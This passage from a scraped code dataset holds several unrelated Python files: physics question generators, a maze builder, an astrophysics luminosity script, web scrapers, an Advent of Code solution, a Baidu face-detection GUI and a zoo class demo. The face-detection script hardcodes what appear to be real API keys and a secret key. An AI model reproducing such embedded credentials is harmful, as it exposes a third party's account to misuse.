return\n","repo_name":"CindyChow123/DeepLearning_2021_spring","sub_path":"Assignment_1_perceptron/mlp_numpy.py","file_name":"mlp_numpy.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5006424662","text":"import random\n\n# Calculate the wavelength of a sound wave whose frequency is f hz and speed is v m/s in a given medium. \n# Calculate the frequency of a sound wave whose wavelength is lamb m and speed is v m/s in a given medium. \n# Calculate the speed of a sound wave whose frequency is f hz and wavelength is lamb m in a given medium. 
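\n# Worked example: v = f * lamb, so f = 343 Hz and lamb = 1 m give v = 343 m/s; the generators below\n# choose v as an exact multiple of f (or lamb), so the integer divisions in the helpers are exact.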
\n\nqns = open('./questions.txt', 'w') \nans = open('./answers.txt','w')\nno_of_samples = 2000000\n# no_of_samples = 8\n\ndef calculation_lamb(f, v): \n return v // f\n\ndef calculation_f(lamb, v):\n return v // lamb\n\ndef calculation_v(f , lamb):\n return f*lamb\n\ndef type1():\n f = random.randint(1,1000)\n v = (random.randint(1,1000))*f\n lamb = str(calculation_lamb(f,v)) + \" m\\n\"\n q = \"Calculate the wavelength of a sound wave whose frequency is \"+str(f)+\" hz and speed is \"+str(v)+\" m/s in a given medium ?\\n\"\n return q,lamb\n\ndef type2():\n lamb = random.randint(1,1000)\n v = (random.randint(1,1000))*lamb\n f = str(calculation_f(lamb,v)) + \" hz\\n\"\n q = \"Calculate the frequency of a sound wave whose wavelength is \"+str(lamb)+\" m and speed is \"+str(v)+\" m/s in a given medium ?\\n\"\n return q,f\n\ndef type3():\n f = random.randint(1,2000)\n lamb = random.randint(1,1000)\n v = str(calculation_v(f,lamb)) + \" m/s\\n\"\n q = \"Calculate the speed of a sound wave whose frequency is \"+str(f)+\" hz and wavelength is \"+str(lamb)+\" m in a given medium ?\\n\"\n return q,v\n\nfor i in range(no_of_samples):\n types = random.randint(0,3)\n if types == 0:\n ques,answer = type1()\n if types == 1:\n ques,answer = type2()\n if types == 2 or types == 3:\n ques,answer = type3()\n qns.write(ques)\n ans.write(answer)\n # print(ques)\n # print(answer)\n \nqns.close()\nans.close()\n","repo_name":"misterpawan/scimat2","sub_path":"science/Sound/v_nu_lamb/v_nu_lamb.py","file_name":"v_nu_lamb.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"14332253847","text":"#Amazing Mazes\n# Recursive Backtrack\nfrom maze_classes import *\n\ndef build_recursive(maze):\n\n path = []\n cell = maze.maze_cells[0][0]\n path.append(cell.ID())\n cell.Visit()\n\n cells_nb = maze.N * maze.N\n\n while len(path) < cells_nb:\n prev_X = cell.X\n prev_Y = cell.Y\n cell = next(cell)\n \n if cell == 'END':\n i = -1\n while maze.maze_cells[path[i][0]][path[i][1]].available_dir() == []:\n i = i - 1\n \n prev_X = path[i][0]\n prev_Y = path[i][1]\n cell = next(maze.maze_cells[path[i][0]][path[i][1]])\n \n if cell.X == prev_X:\n if cell.Y > prev_Y:\n dir = 'W'\n else:\n dir = 'E'\n\n elif cell.Y == prev_Y:\n if cell.X > prev_X:\n dir = 'N'\n else:\n dir = 'S'\n\n path.append(cell.ID())\n cell.Visit()\n cell.break_wall(dir)\n \n return maze\n\ndef next(cell):\n\n next_list = cell.available_dir()\n if next_list != []:\n dir = random.choice(next_list)\n\n if dir == 'N' and cell.X > 0:\n return cell.maze.maze_cells[cell.X-1][cell.Y]\n\n elif dir == 'E' and cell.Y < cell.maze.N - 1:\n return cell.maze.maze_cells[cell.X][cell.Y+1]\n\n elif dir == 'S' and cell.X < cell.maze.N - 1:\n return cell.maze.maze_cells[cell.X+1][cell.Y]\n\n elif dir == 'W' and cell.Y > 0:\n return cell.maze.maze_cells[cell.X][cell.Y-1]\n\n else:\n next(cell)\n\n else:\n return 'END'","repo_name":"hamdain-mazen/amazing-mazes","sub_path":"generator_RBT.py","file_name":"generator_RBT.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"1602071095","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 7 17:55:24 2023\n\n@author: konstantinos\n\"\"\"\nfrom src.Utilities.isalice import isalice\nalice, plot = isalice()\n\nimport sys\nsys.path.append('/Users/paolamartire/tde_comparison')\n\nimport numpy as np\nimport 
numba\nfrom src.Opacity.opacity_table import opacity\nfrom src.Calculators.raymaker_tube import ray_maker\nfrom src.Luminosity.special_radii_tube import get_photosphere\n\n# Setup\nif alice:\n fixes = np.arange(845, 1005, step = 10)\n prunes = [1] * len(fixes)\nelse:\n fixes = [844, 881, 925, 950]\n prunes = [1, 4, 10, 20]\n \nm = 6\n# Constants\nc_cgs = 3e10 # [cm/s]\nRsol_to_cm = 6.957e10 # [cm]\npre = '/home/s3745597/data1/TDE/'\n#%%\n@numba.njit\ndef grad_calculator(ray: np.array, radii: np.array, r_photo): \n # For a single ray (in logspace) get \n # the index of radius closest to sphere_radius and the gradE there.\n # Everything is in CGS.\n for i, radius in enumerate(radii):\n if radius > r_photo:\n idx = i - 1 \n break\n \n # For rad\n if idx<0:\n print('Bad Observer, photosphere is the closest point')\n idx=0\n \n step = radii[idx+1] - radii[idx]\n grad_E = (ray[idx+1] - ray[idx]) / step \n\n return grad_E, idx\n\n \ndef flux_calculator(grad_E, idx, \n single_Rad, single_T, single_Den):\n \"\"\"\n Get the flux for every observer.\n Eevrything is in CGS.\n\n Parameters: \n grad_E idx_tot are 1D-array of lenght = len(rays)\n rays, rays_T, rays_den are len(rays) x N_cells arrays\n \"\"\"\n # We compute stuff OUTSIDE the photosphere\n # (which is at index idx_tot[i])\n idx = idx+1 # \n Energy = single_Rad[idx]\n max_travel = np.sign(-grad_E) * c_cgs * Energy # or should we keep the abs???\n \n Temperature = single_T[idx]\n Density = single_Den[idx]\n \n # Ensure we can interpolate\n rho_low = np.exp(-45)\n T_low = np.exp(8.77)\n T_high = np.exp(17.8)\n \n # If here is nothing, light continues\n if Density < rho_low:\n return max_travel\n \n # If stream, no light \n if Temperature < T_low: \n return 0\n \n # T too high => Kramers'law\n if Temperature > T_high:\n X = 0.7389\n k_ross = 3.68 * 1e22 * (1 + X) * Temperature**(-3.5) * Density #Kramers' opacity [cm^2/g]\n k_ross *= Density\n else: \n # Get Opacity, NOTE: Breaks Numba\n k_ross = opacity(Temperature, Density, 'rosseland', ln = False)\n \n # Calc R, eq. 28\n R = np.abs(grad_E) / (k_ross * Energy)\n invR = 1 / R\n # Calc lambda, eq. 27\n coth = 1 / np.tanh(R)\n lamda = invR * (coth - invR)\n # Calc Flux, eq. 
26\n Flux = - c_cgs * grad_E * lamda / k_ross\n \n # Take the minimum between F, cE\n if Flux > max_travel:\n return max_travel\n else:\n return Flux\n\ndef red(fixes, m, prunes):\n\n bols = []\n photos = []\n for d, fix in enumerate(fixes):\n rays_T, rays_Den, rays_Rad, rays_R = ray_maker(fix, m, prunes[d])\n cumul_kappa, photo = get_photosphere(rays_T, rays_Den, rays_R)\n fluxes = []\n for i in range(len(rays_T)):\n \n # Isolate ray\n single_T = rays_T[i]\n single_Den = rays_Den[i]\n single_Rad = rays_Rad[i]\n single_radii = rays_R[i]\n \n # Calculate gradE\n grad_E, idx = grad_calculator(single_Rad, single_radii, photo[i])\n \n # Calculate Flux \n flux = flux_calculator(grad_E, idx, \n single_Rad, single_T, single_Den)\n fluxes.append(flux) # Keep it\n \n # Convert to luminosity \n lum = np.zeros(len(fluxes))\n for i in range(len(fluxes)):\n # Ignore negative flux\n if fluxes[i] < 0:\n continue\n # Convert photo to cm\n r = photo[i] * Rsol_to_cm\n lum[i] = fluxes[i] * 4 * np.pi * r**2\n \n # Average in observers\n bol_lum = np.sum(lum)/192\n print('L FLD: %.2e' % bol_lum)\n # Hold\n bols.append(bol_lum)\n photos.append(photo)\n \n if alice:\n np.savetxt(pre + 'data/red_tube_alice', bols)\n np.savetxt(pre + 'data/photosphere_alice', photos)\n else:\n np.savetxt('data/red_tube',bols)\n np.savetxt('data/photosphere', photos)\n \n # if not alice:\n # from src.Utilities.finished import finished\n # finished()\n \n return bols, photos\n#%% Main\n\nbols, photos = red(fixes, m, prunes)\n#%% Plot & Print\n\nif plot and not alice:\n import matplotlib.pyplot as plt\n plt.rcParams['text.usetex'] = True\n plt.rcParams['figure.dpi'] = 300\n plt.rcParams['font.family'] = 'Times New Roman'\n plt.rcParams['figure.figsize'] = [5 , 4]\n plt.rcParams['axes.facecolor']= \t'whitesmoke'\n plt.rcParams['xtick.direction'] = 'in'\n plt.rcParams['ytick.direction'] = 'in'\n AEK = '#F1C410' # Important color \n # Choose fix\n which = 0\n lum = bols[which]\n photo = photos[which]\n \n # Plot\n fig, ax = plt.subplots(1,2, figsize = (10, 6))\n ax[0].plot(lum, 'o', c ='k')\n \n # Make pretty\n ax[0].set_yscale('log')\n ax[0].set_title('FLD Luminosity')\n ax[0].set_xlabel('Observers')\n ax[0].set_ylabel('Luminosity [erg/s]')\n \n # Plot Photo\n ax[1].plot(photo, 'o', c = 'k')\n \n ## Make pretty\n # My lines\n from scipy.stats import gmean\n ax[1].axhline(np.mean(photo), linestyle = '--' ,c = 'seagreen')\n ax[1].axhline(gmean(photo), linestyle = '--', c = 'darkorange')\n #ax[1].text()\n # Elad's lines\n ax[1].axhline(40 , c = AEK)\n ax[1].axhline(700, c= 'lightseagreen')\n \n ax[1].set_yscale('log')\n ax[1].set_title('Photosphere')\n ax[1].set_ylabel(r'Photosphere Radius [$R_\\odot$]')\n ax[1].set_xlabel('Observers')\n plt.show()\n \n","repo_name":"KKilmetis8/tde_comparison","sub_path":"src/Luminosity/red_tube.py","file_name":"red_tube.py","file_ext":"py","file_size_in_byte":5911,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71648506386","text":"from getdata.items import GetdataItem\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\n\n\nclass MyJiao(CrawlSpider):\n name = \"jiaoyu\"\n allowed_domains = ['www.moe.gov.cn']\n start_urls = [\n 'http://www.moe.gov.cn/jyb_xwfb/gzdt_gzdt/'\n ]\n\n for i in range(1, 10):\n url = \"http://www.moe.gov.cn/jyb_xwfb/gzdt_gzdt/index_\" + str(i) + \".html\"\n start_urls.append(url)\n\n rules = [\n Rule(LinkExtractor(allow='/moe'), callback='parse_item'),\n 
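# also follow article links whose URL matches jyb_xwfb/gzdt_gzdt/s\n        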
Rule(LinkExtractor(allow='jyb_xwfb/gzdt_gzdt/s'), callback='parse_item')\n    ]\n\n    def parse_item(self, response):\n        title = response.xpath('//*[@id=\"moe-detail-box\"]/h1/text()').extract()\n        add_time = response.xpath('//*[@id=\"moe-detail-box\"]/div[1]/text()').extract()\n        content = response.xpath('//*[@id=\"moe-detail-box\"]/div[2]/p').extract()\n        editor = response.xpath('//*[@id=\"detail-editor\"]/text()').extract()\n\n        item = GetdataItem()\n        item['title'] = title\n        item['add_time'] = add_time\n        item['content'] = content\n        item['editor'] = editor\n\n        yield item\n","repo_name":"Clay-J-Lei/jiaoyubuxinwenpachong","sub_path":"getdata/getdata/spiders/jiaoyu.py","file_name":"jiaoyu.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"25848114261","text":"import itertools as iter\nimport collections as col\nimport hashlib as hash\nimport math\nimport json\nimport re\nimport os\nimport sys\n\nfrom autoInput import getInput, startInputClock\nfrom autoSubmit import submitAnswer\n\ndef main(lines):\n\n    # PART 1 & PART 2\n    S = set()\n    S.add((0, 0)) # the starting location counts as visited\n    lines = lines[0].split(\", \")\n    part1, part2 = 0, 0\n    x, y = 0, 0\n    # direction index 0 = N, 1 = E, 2 = S, 3 = W, with matching unit steps\n    steps = [(0, 1), (1, 0), (0, -1), (-1, 0)]\n    dir = 0\n    for item in lines:\n        turn, distance = item[0], int(item[1:])\n        if turn == \"R\": dir = (dir + 1) % 4\n        elif turn == \"L\": dir = (dir - 1) % 4\n\n        # walk one block at a time so every intermediate point is checked\n        dx, dy = steps[dir]\n        for _ in range(distance):\n            x += dx\n            y += dy\n            if part2 == 0 and (x, y) in S:\n                part2 = abs(x) + abs(y) # first location visited twice\n            S.add((x, y))\n    part1 = abs(x) + abs(y)\n\n    return part1, part2\n\nif __name__ == '__main__':\n    PART_1 = False # NOTE: FLIP FOR PART 2 SUBMISSIONS\n\n    year, day = os.path.basename(os.getcwd()), re.findall(r'^.*day(\\d+).py$', __file__)[0]\n    if not os.path.isfile(f'{os.getcwd()}/day{day}input.txt'):\n        getInput(year, day)\n\n    lines = [l.strip() for l in open(f'day{day}input.txt').readlines()]\n\n    part1, part2 = main(lines)\n    print(part1, part2)\n\n    SUBMIT = True if input(\"Submit? 
(Y: / N: NOT )\") == \"\" else False\n if PART_1 and SUBMIT:\n resp = submitAnswer(year, day, 1, part1)\n print(resp)\n if resp == \"CORRECT\": PART_1 = False # NOTE: This is where we update the db file\n elif not PART_1 and SUBMIT:\n resp = submitAnswer(year, day, 2, part2)\n print(resp)\n if resp == \"CORRECT\": print(\"Problem complete.\") # NOTE: This is where we update the db file","repo_name":"chasecolford/AdventOfCode","sub_path":"2016/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6478282369","text":"import os\n\nfrom testlink.exception.base import TestLinkException\nfrom testlink.resource.project import Projects\nfrom testlink.resource.cases import TestCaseAccess\nfrom testlink.resource.builds import TestBuildAccess\nfrom testlink.resource.suites import TestSuiteAccess\nfrom testlink.resource.plans import TestPlanAccess\nfrom testlink.resource.platform import TestPlatformAccess\nfrom testlink.resource.sundry import MethodResult\nfrom testlink.common import args\n\nimport xmlrpclib\n\nURL_ENV_VAR = \"TESTLINK_URL\"\nKEY_ENV_VAR = \"TESTLINK_KEY\"\n\ndef find_creds():\n \"\"\"\n Searches the user's environment for TestLink credentials and urls\n \"\"\"\n try:\n url = os.environ[URL_ENV_VAR]\n key = os.environ[KEY_ENV_VAR]\n return (url, key)\n except KeyError:\n return (None, None)\n\n\nclass TestLinkClient(TestCaseAccess, TestPlanAccess,\n TestBuildAccess, TestSuiteAccess, TestPlatformAccess):\n DELETE_EXECUTION = 'deleteExecution'\n \n def __init__(self, url=None, key=None):\n \"\"\"\n Create a TestLinkClient\n \"\"\"\n invalid = lambda: not url or not key\n if invalid():\n url, key = find_creds()\n if invalid():\n raise TestLinkException(\"Could not find url or key to connect to the TestLinkAPI\")\n self.url = url\n self.key = key\n self.server = xmlrpclib.Server(url)\n self.projects = Projects(self)\n #Making itself the connection is a bit of a 'hack', but allows a clean\n #interface for getting objects \n self.connection = self \n\n\n def request(self, method, params={}):\n \"\"\"\n Make a request to a method on the server\n \"\"\"\n params[args.DEVKEY] = self.key\n try:\n return getattr(self.server.tl, method)(params)\n except TypeError:\n raise TestLinkException(\"Call failed with parameters: {}\".format(str(params)))\n \n\n def delete_execution_result(self, execution_id):\n \"\"\"\n Delete's an execution result from the server. 
Useful in conjunction\n with the Testcase.latest_execution_result method\n \"\"\"\n params = {\n args.EXECUTION_ID: execution_id\n }\n results = self.request(self.DELETE_EXECUTION, params=params)\n return MethodResult(**results)\n","repo_name":"adamsar/testlink-python-api","sub_path":"src/testlink/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36674382474","text":"import os\nimport PIL\nfrom PIL import Image,ImageTk,ImageDraw,ImageFont\nfrom tkinter import *\nfrom tkinter import filedialog,font\nfrom aip import AipFace\nimport base64\nimport imghdr\nimport math\nimport warnings\nimport copy\n\ndef pointRotate(x,y,rx0,ry0,r):\n x0 = (x-rx0)*math.cos(r*math.pi/180) - (y-ry0)*math.sin(r*math.pi/180) + rx0\n y0 = (x-rx0)*math.sin(r*math.pi/180) + (y-ry0)*math.cos(r*math.pi/180) + ry0\n return x0,y0\ndef rectwithRotation(left,top,width,height,rotate):\n x1,y1 =left,top\n a2=left+width\n b2=top\n a3=left+width\n b3=top+height\n a4=left\n b4=top+height\n x2,y2 = pointRotate(a2,b2,x1,y1,rotate)\n x3,y3 = pointRotate(a3,b3,x1,y1,rotate)\n x4,y4 = pointRotate(a4,b4,x1,y1,rotate)\n return x1,y1,x2,y2,x3,y3,x4,y4\ndef isPic(fileDir):\n fileType = imghdr.what(fileDir)\n picTypes = ['jpg','jpeg','png','bmp','tiff','ico']\n if fileType in picTypes:\n return True\n else:\n return False\ndef formatSize(size):\n strSize = ''\n if size<1024:\n strSize = '{}B'.format(size)\n elif size<1048576:\n strSize = '{:.2f}KB'.format(size/1024)\n elif size<1073741824:\n strSize = '{:.2f}MB'.format(size/1048576)\n return strSize\ndef browseFile():\n global imageEntry,originImage,label_imgo,infoLabel,originFrame\n warnings.simplefilter('ignore', PIL.Image.DecompressionBombWarning)\n fileDir = filedialog.askopenfilename(initialdir =os.curdir)\n if fileDir!='': \n if isPic(fileDir=fileDir): \n imageEntry.config(state=NORMAL)\n imageEntry.delete(0,END)\n imageEntry.insert(0,fileDir)\n imageEntry.config(state=DISABLED)\n img = PIL.Image.open(fileDir)\n img.thumbnail((500,500))\n originImage = ImageTk.PhotoImage(img)\n label_imgo = Label(originFrame,image=originImage)\n label_imgo.place(x=250,y=250,anchor = CENTER)\n size = os.path.getsize(fileDir)\n infoLabel['text']='图片大小:'+ formatSize(size=size)\n else:\n infoLabel['fg']='red'\n infoLabel['text']='错误:图片格式不正确!(支持格式:jpg,jpeg,png,bmp,tiff,ico)'\n\ndef detect():\n global imageEntry,resultImage,label_img,infoLabel\n fileDir = imageEntry.get()\n APP_ID = '11275370'\n API_KEY = '181Wzp3m6V6mrDwDjLg4qcS5'\n SECRET_KEY = 'vuVpNOck5CpIDjv9Z9w5AyPohhjfBGTK'\n\n client = AipFace(APP_ID, API_KEY, SECRET_KEY)\n options = {}\n options[\"face_field\"] = \"age,beauty,gender,glasses\"\n options[\"max_face_num\"] = 10\n options[\"face_type\"] = \"LIVE\"\n\n imageUrl = fileDir\n file = open(imageUrl, 'rb').read()\n bs = base64.b64encode(file)\n image = bytes.decode(bs)\n imageType = \"BASE64\"\n result = client.detect(image, imageType,options)\n print(result)\n filepath,shotname,extension = get_filePath_fileName_fileExt(imageUrl)\n error_code = result['error_code']\n error_msg = result['error_msg']\n if error_code==0:\n face_num = result['result']['face_num']\n face_list = result['result']['face_list']\n img = PIL.Image.open(imageUrl)\n draw=ImageDraw.Draw(img)\n font = ImageFont.truetype(\"AdobeFangsongStd-Regular.otf\",20)\n for i in range(face_num): \n face_probability = '%.2f' % face_list[i]['face_probability']\n age = face_list[i]['age']\n beauty 
= '%.2f' % face_list[i]['beauty']\n gender = face_list[i]['gender']['type']\n glasses = face_list[i]['glasses']['type']\n print(\"{}号人脸置信度:{} 年龄:{} 颜值:{} 性别:{} 眼镜:{}\".format(i+1,face_probability,age,beauty,gender,glasses))\n if float(face_probability)>=0.5: \n left = face_list[i]['location']['left']\n top = face_list[i]['location']['top']\n width = face_list[i]['location']['width']\n height = face_list[i]['location']['height']\n rotation = face_list[i]['location']['rotation']\n draw.polygon(rectwithRotation(left,top,width,height,rotation),outline=\"red\")\n x = left\n y = top + height\n draw.rectangle((left,top+height,left+100,top+height+100),fill='white')\n draw.text((x,y),\"年龄:\"+str(age),fill='black', font=font)\n draw.text((x,y+20),\"性别:\"+str(gender),fill='black', font=font)\n draw.text((x,y+40),\"颜值:\"+str(beauty),fill='black', font=font)\n draw.text((x,y+60),\"眼镜:\"+str(glasses),fill='black', font=font)\n draw.text((x,y+80),\"置信:\"+str(face_probability),fill='black', font=font)\n img.save(os.curdir+'/new'+shotname+extension)\n thumb = copy.copy(img)\n thumb.thumbnail((500,500))\n resultImage = ImageTk.PhotoImage(thumb)\n label_img = Label(resultFrame,image=resultImage)\n imgW = thumb.size[0]\n imgH = thumb.size[1]\n imgX = (500-imgW)/2\n imgY = (500-imgH)/2\n label_img.place(x=imgX,y=imgY)\n infoLabel['fg']='black'\n infoLabel['text']='图片分析完毕'\n\n \n else:\n print(\"图片解析错误!错误码:{} 错误信息:{}\".format(error_code,error_msg))\n \ndef get_filePath_fileName_fileExt(filename): \n (filepath,tempfilename) = os.path.split(filename)\n (shotname,extension) = os.path.splitext(tempfilename)\n return filepath,shotname,extension\n\n\nroot = Tk()\nroot.resizable(0,0) \nroot.title(\"人脸检测\")\nroot.iconbitmap('b13.ico')\nroot.geometry('1080x620')\n\nmenu = Menu(root)\nmenu.add_command(label='颜值排行榜')\nroot['menu']= menu\n\noriginFrameBorder = Frame(root,height=500,width=500,bd =2,relief=GROOVE)\noriginFrameBorder.grid(row=1,column=0,sticky=W,padx=20,pady=10)\n\noriginFrame = Frame(originFrameBorder,height=500,width=500)\noriginFrame.pack()\n\n\nresultFrameBorder = Frame(root,height=500,width=500,bd =2,relief=GROOVE)\nresultFrameBorder.grid(row=1,column=1,sticky=E,padx=20,pady=10)\n\nresultFrame = Frame(resultFrameBorder,height=500,width=500)\nresultFrame.pack()\n\nselectFrame = Frame(root,height=20,width=500)\nselectFrame.grid(row=2,column=0)\n \ninfoFrame = Frame(root,height=20,width=500)\ninfoFrame.grid(row=2,column=1) \ninfoLabel = Label(infoFrame,text='')\ninfoLabel.pack()\n\nimageLabel = Label(selectFrame,text='图片路径:')\nimageLabel.grid(row=0,column=0)\nimageEntry = Entry(selectFrame,width=60)\nimageEntry.config(state=DISABLED)\nimageEntry.grid(row=0,column=1)\n\nselectFileButton = Button(root,width=20,height=1,text=\"选择图片\",command=browseFile, relief=RIDGE)\nselectFileButton.grid(row=3,column=0,pady=10)\ndetectButton = Button(root,width=20,height=1,text=\"检测\", command=detect, relief=RIDGE)\ndetectButton.grid(row=3,column=1,pady=10)\n\nroot.mainloop()\n","repo_name":"zerolanlan/project-in-github","sub_path":"pathon程序/TopFace-1.py","file_name":"TopFace-1.py","file_ext":"py","file_size_in_byte":6847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36186123195","text":"\nimport wikipedia\nimport re\nimport json\nimport random\n\n\ndef get_all_words():\n with open('all words.json', 'rt') as fin:\n data = fin.read()\n\n data = json.loads(data)\n\n all_categories = list(data.keys())\n category = random.choice(all_categories)\n word = ''\n\n for 
key, pair in data.items():\n        if key == category:\n            all_words = pair\n\n    random.shuffle(all_words)\n\n    return category, all_words\n\ncategory, all_words = get_all_words()\n\n\ndef get_category():\n    return category\n\n\ndef get_clue(word):\n    try:\n        # get the correct line on wikipedia\n        main_text = wikipedia.summary(word, sentences=1)\n        # remove instances of key word\n        main_text = re.sub(word, '_______', main_text, flags=re.IGNORECASE)\n        # if key word is \"jumping\" remove instances of \"jump\"\n        if word[-3:] == 'ing':\n            remove_chars = 3\n            if word[-4] == word[-5]:\n                remove_chars = 4\n            main_text = re.sub(word[0:-remove_chars], '_______', main_text,\n                               flags=re.IGNORECASE)\n        # if key word is \"photography\" remove instances of \"photograph\"\n        if word[-1:] == 'y':\n            main_text = re.sub(word[0:-1], '_______', main_text,\n                               flags=re.IGNORECASE)\n        # if there are spaces, remove each word ex. Home Depot remove Home and\n        # Depot\n        if len(word.split(' ')) > 1:\n            for part in word.split(' '):\n                if part in main_text:\n                    main_text = re.sub(part, '_______', main_text,\n                                       flags=re.IGNORECASE)\n        # remove parenthesis\n        main_text = re.sub('\\([^)]*\\)', '', main_text,\n                           flags=re.IGNORECASE)\n        # (sometimes there's still some left behind)\n        main_text = main_text.replace('(', '')\n        main_text = main_text.replace(')', '')\n\n        return main_text\n    except:\n        print('ERROR ON WORD', word)\n","repo_name":"Michael12309/CrosswordGenerator","sub_path":"Crossword.py","file_name":"Crossword.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"559080002","text":"from animals import Llama\nfrom animals import Goat\nfrom animals import Bunny\nfrom animals import Bobcat\nfrom animals import Ostrich\nfrom animals import Boa\nfrom animals import Python\nfrom animals import Catepillar\nfrom animals import Inchworm\nfrom animals import Cottonmouth\nfrom animals import Clownfish\nfrom animals import Blowfish\nfrom animals import Beluga\nfrom animals import Turtle\nfrom animals import Penguin\nfrom animals import Goose\nfrom animals import Animal\nfrom attractions import PettingZoo\nfrom attractions import WetLands\nfrom attractions import ReptileHouse\nfrom attractions import Attraction\n# from movements import Walking\n# from movements import Swimming\n# from movements import Slithering\n\nbob = Goose(\"Bob\", \"Canada goose\", \"morning\",\"watercress sandwiches\", 44995)\nbob.run()\nbob.swim()\n\nmiss_fuzz = Llama(\"Miss Fuzz\", \"domestic llama\", \"midday\", \"llama chow\", 55234)\nprint(miss_fuzz.chip_number)\n\n\nprint(miss_fuzz.name)\nprint(f'{miss_fuzz.name}, the {miss_fuzz.species}, is available to pet during the {miss_fuzz.shift} shift.')\nmiss_fuzz.feed()\n\nfuzz_butt = Goat(\"Fuzz Butt\", \"cutest baby goat ever\", \"morning\", \"goat food\", 55012)\nprint(fuzz_butt)\nprint(f'{fuzz_butt.name}, the {fuzz_butt.species}, is available to pet during the {fuzz_butt.shift} shift.')\nfuzz_butt.feed()\n\nbugs = Bunny(\"Bugs\", \"wraskly rabbit\", \"afternoon\", \"carrots\", 55901)\nprint(bugs)\nprint(f'{bugs.name}, the {bugs.species}, is available to pet during the {bugs.shift} shift.')\nbugs.feed()\n\nrufus = Bobcat(\"Rufus\", \"best party cat\", \"morning\", \"bobcat chow\", 55743)\nprint(rufus)\nprint(f'{rufus.name}, the {rufus.species}, is available to pet during the {rufus.shift} shift.')\nrufus.feed()\n\njerkface = Ostrich(\"Jerk Face\", \"biggest jerkiest bird ever\", \"afternoon\", \"stolen pellets\", 
55821)\nprint(jerkface)\nprint(f'{jerkface.name}, the {jerkface.species}, is available to pet during the {jerkface.shift} shift.')\njerkface.feed()\n\neek = Python(\"Eek\", \"slimy\", \"ill behaved children\", 33935)\nprint(eek)\neek.feed()\n\nheckno = Boa(\"Heck No\", \"nope\", \"mice\", 33912)\nprint(heckno)\nheckno.feed()\n\nbecoming = Catepillar(\"Becoming Butterfly\", \"transitional\", \"milkweed\", 33054)\nprint(becoming)\nbecoming.feed()\n\ntiny = Inchworm('Tiny', \"green worm\", \"worm food\", 33664)\nprint(tiny)\ntiny.feed()\n\n\ngross = Cottonmouth(\"Gross\", \"run away\", \"mice\", 33742)\nprint(gross)\ngross.feed()\n\nnemo = Clownfish(\"Nemo\", \"rebellious kid fish\", \"fish food\", 77001)\nprint(nemo)\nnemo.feed()\n\nnotouchy = Blowfish(\"No Touchy\", \"spiky fish\", \"fish food\", 77824)\nprint(notouchy)\nnotouchy.feed()\n\ndude = Turtle(\"Dude\", \"wise turtle\", \"turtle chow\", 77931)\nprint(dude)\ndude.feed()\n\nsmooshy = Beluga(\"Smooshy\", \"darn cute whale\", \"whale mix\", 77096)\nprint(smooshy)\nsmooshy.feed()\n\ntuxedo = Penguin(\"Tuxedo\", \"formal cutie\", \"baby fish\", 77843)\nprint(tuxedo)\ntuxedo.feed()\n\ndef report_animals_by_attractions(*attractions):\n\n for attraction in attractions:\n print(f'{attraction.attraction_name} is where you can find {attraction.description} like:')\n for animal in attraction.animals:\n print(f'* {animal.name} the {animal.species}.')\n\n\nvarmint_village = PettingZoo(\"Varmint Village\", \"cute and fuzzy critters to cuddle!\")\nvarmint_village.animals.extend([bugs, miss_fuzz, fuzz_butt, rufus, jerkface])\nfor animal in varmint_village.animals:\n print(f'You can find {animal.name} the {animal.species} in {varmint_village.attraction_name}.')\nprint(varmint_village.last_critter_added)\n# varmint_village.add_animal(bob)\n# for animal in varmint_village.animals:\n# print(animal)\n\nslither_inn = ReptileHouse(\"Slither Inn\", \"snakes and slimy things of all sizes\")\nslither_inn.animals.extend([eek, heckno, becoming, tiny, gross])\nfor animal in slither_inn.animals:\n print(f'You can find {animal.name} the {animal.species} in {slither_inn.attraction_name}.')\nprint(slither_inn.last_critter_added)\n\n\ncritter_cove = WetLands(\"Critter Cover\", \"one acre walk through with lots of water animals\")\ncritter_cove.animals.extend([nemo, notouchy, dude, smooshy, tuxedo])\nfor animal in critter_cove.animals:\n print(f'You can find {animal.name} the {animal.species} in {critter_cove.attraction_name}.')\nprint(critter_cove.last_critter_added)\n\nreport_animals_by_attractions(critter_cove, slither_inn, varmint_village)","repo_name":"mbrownlee/CrittersAndCroquettes","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74872837905","text":"from django.conf.urls import include, url\n# from django.contrib import admin\n\n # Examples:\n # url(r'^$', 'html_portfolio.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n # url(r'^admin/', include(admin.site.urls)),\n # -----------------------------------------------\n\nurlpatterns = [\n url(r'^javapic/', include('javapic.urls', namespace='javapic')),\n url(r'^javapic_jquery/', include('javapic_jquery.urls', namespace='javapic_jquery')),\n url(r'^zen_mockup/', include('zen_mockup.urls')),\n url(r'^forum/', include('forum.urls')),\n\n # new url patterns should be coded above\n url(r'^', 
